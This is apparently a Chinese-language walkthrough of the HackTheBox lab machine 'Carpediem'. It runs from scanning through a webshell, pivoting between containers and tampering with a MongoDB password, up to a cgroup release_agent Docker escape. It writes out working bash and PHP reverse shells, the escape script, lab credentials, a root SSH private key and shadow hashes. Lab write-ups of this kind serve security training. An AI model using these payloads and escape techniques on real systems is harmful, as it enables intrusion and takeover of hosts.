基本信息
端口扫描 22和80:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ nmap -sC -sV -Pn 10.10.11.167 Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-27 13:12 CST Nmap scan report for 10.10.11.167 Host is up (0.19s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 962176f72dc5f04ee0a8dfb4d95e4526 (RSA) | 256 b16de3fada10b97b9e57535c5bb76006 (ECDSA) |_ 256 6a1696d80529d590bf6b2a0932dc364f (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Comming Soon Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.62 seconds
80 comming soon,得到的域名加hosts:
1 10.10.11.167 carpediem.htb
子域名扫描 常规字典扫描子域名,发现porpal:
1 2 3 gobuster vhost -u http://carpediem.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Found: portal.carpediem.htb (Status: 200) [Size: 31090]
加hosts:
1 10.10.11.167 carpediem.htb portal.carpediem.htb
portal.carpediem.htb 在线摩托商城:
目录扫描 目录扫描,在portal下发现admin:
1 2 3 4 5 6 7 8 9 10 11 12 gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://portal.carpediem.htb /admin (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/admin/] /assets (Status: 301) [Size: 329] [--> http://portal.carpediem.htb/assets/] /build (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/build/] /classes (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/classes/] /dist (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/dist/] /inc (Status: 301) [Size: 326] [--> http://portal.carpediem.htb/inc/] /index.php (Status: 200) [Size: 31090] /libs (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/libs/] /plugins (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/plugins/] /uploads (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/uploads/]
portal.carpediem.htb 任意注册登录,更新资料的请求中发现login_type参数:
尝试将其修改为1,我们是管理员,可以访问admin界面:
webshell 上传季度报告处,网页上显示上传功能还在开发,但可以得到upload接口直接调用,从而上传webshell:
reverse shell 一个容器内的www-data:
1 bash -c 'exec bash -i &>/dev/tcp/10.10.14.19/4444 <&1'
docker网段扫描 这部分考试网络问题比较差,参考wp云了
探测docker网段,发现其他容器:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 Nmap scan report for 172.17.0.1 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap scan report for 172.17.0.2 PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 443/tcp open https Nmap scan report for 172.17.0.3 PORT STATE SERVICE 27017/tcp open unknown Nmap scan report for 172.17.0.4 PORT STATE SERVICE 3306/tcp open mysql 33060/tcp open unknown Nmap scan report for 172.17.0.5 PORT STATE SERVICE 8118/tcp open unknown
mongosh 27017和8118,转到本地访问:
1 2 3 4 5 # local chisel server --reverse --port 8000 # target www-data@3c371615b7aa:/dev/shm$ ./chisel client 10.10.14.19:8000 R:8118:172.17.0.5:8118 R:27017:172.17.0.3:27017 &
访问本地8000端口,发现是Trudesk,账号密码在mongo中,破解不出来,密码是bcrypt,生成一个后直接修改数据库:
1 2 3 4 5 6 ❯ python3 password.py $ 2b$10 $zX4LTPwe7bEjhvQ .lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey mongosh mongodb://127.0.0.1:27017 test> use trudesk trudesk> db.accounts.update( {"_id" : ObjectId("623c8b20855cc5001a8ba13c" )}, {$set : {"password" : "$2b $10 $zX4LTPwe7bEjhvQ .lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey" }});
然后使用修改的密码登录Trudesk,其中一张ticket中得到zoiper相关信息
zoiper 我们知道域是 carpediem.htb,它告诉我们 9560 是用户
密码告诉我们现在是 2022 并且通过拨打 *62 我们可以收听凭据
我们从我们获得的数据开始,拨号时我们听凭据
获得的凭据是 hflaccus : AuRj4pxq9qPk 我们可以通过 ssh 连接
bcrypt.py 1 2 3 4 5 6 7 import bcryptpassword = "password" salt = bcrypt.gensalt(rounds=10 ) encoded = bcrypt.hashpw(password.encode(),salt) print(encoded)
user flag 使用前面得到的hflaccus账户ssh连接,得到user flag:
backdrop 继续云,hflaccus用户tcpdump抓到一些https流量, 使用对应私钥解密,得到jpardella账号密码:
1 2 3 4 5 6 7 tcpdump -i any port 443 -w captura file /etc/ssl/certs/backdrop.carpediem.htb.key /etc/ssl/certs/backdrop.carpediem.htb.key: PEM RSA private key jpardella tGPN6AmJDZwYWdhY
8002 Backdrop 这个账号密码可以登录8002端口的Backdrop:
1 sshpass -p AuRj4pxq9qPk ssh hflaccus@10.10.11.167 -L 8002:127.0.0.1:8002
利用对应漏洞,导入恶意模块,访问执行,得到Backdrop容器shell
信息 寻找有趣的文件,我们可以在 /opt 中看到一个脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 www-data@90c7f522b842:/opt$ cat heartbeat.sh # !/bin/bash # Run a site availability check every 10 seconds via cron checksum=($(/usr/bin/md5sum /var/www/html/backdrop/core/scripts/backdrop.sh)) if [[ $checksum != "70a121c0202a33567101e2330c069b34" ]]; then exit fi status=$(php /var/www/html/backdrop/core/scripts/backdrop.sh --root /var/www/html/backdrop https://localhost) grep "Welcome to backdrop.carpediem.htb!" "$status" if [[ "$?" != 0 ]]; then #something went wrong. restoring from backup. cp /root/index.php /var/www/html/backdrop/index.php fi www-data@90c7f522b842:/opt$
每隔一段时间,它就会更改 index.php 文件并调用它或类似的东西
所以我们直接修改对应php文件,等待触发执行,得到容器root:
1 2 3 4 5 ❯ cat index.php <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'");?> www-data@90c7f522b842:~/html/backdrop$ rm -f index.php www-data@90c7f522b842:~/html/backdrop$ wget http://10.10.14.10/index.php
docker逃逸 & root flag 之后就是逃逸,得到外部宿主机root:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ❯ cat script.sh mkdir /dev/shm/privesc mount -t cgroup -o rdma cgroup /dev/shm/privesc mkdir /dev/shm/privesc/x echo 1 > /dev/shm/privesc/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /dev/shm/privesc/release_agent echo '#!/bin/bash' > /cmd echo "bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'" >> /cmd chmod a+x /cmd bash -c "echo \$\$ > /dev/shm/privesc/x/cgroup.procs" root@90c7f522b842:~# unshare -UrmC bash root@90c7f522b842:~# wget http://10.10.14.10/script.sh &>/dev/null root@90c7f522b842:~# chmod +x script.sh root@90c7f522b842:~# ./script.sh root@90c7f522b842:~#
root_id_rsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
shadow 1 2 root:$6$y5QrvfE3csMMok1t$DvYGED3VsftC3ylIHA8yGVg2j2KiP7uooPn309LahXXPEZulnVWBwwKLorPdiW5snCgWEYN6F24b8LQALG1CD1:19081:0:99999:7::: hflaccus:$6$Y3pKa50HWcGkr/KE$ZBG57pq5RIwDs9l75xJMz5Cv2SweVTFOcsv3WzRLC9c/QRX7wSgNT/XekUYExD30WTZiCHYhLg25mSTRgoZlT.:19083:0:99999:7:::
参考资料
Last updated: 2022-12-05 12:37:03
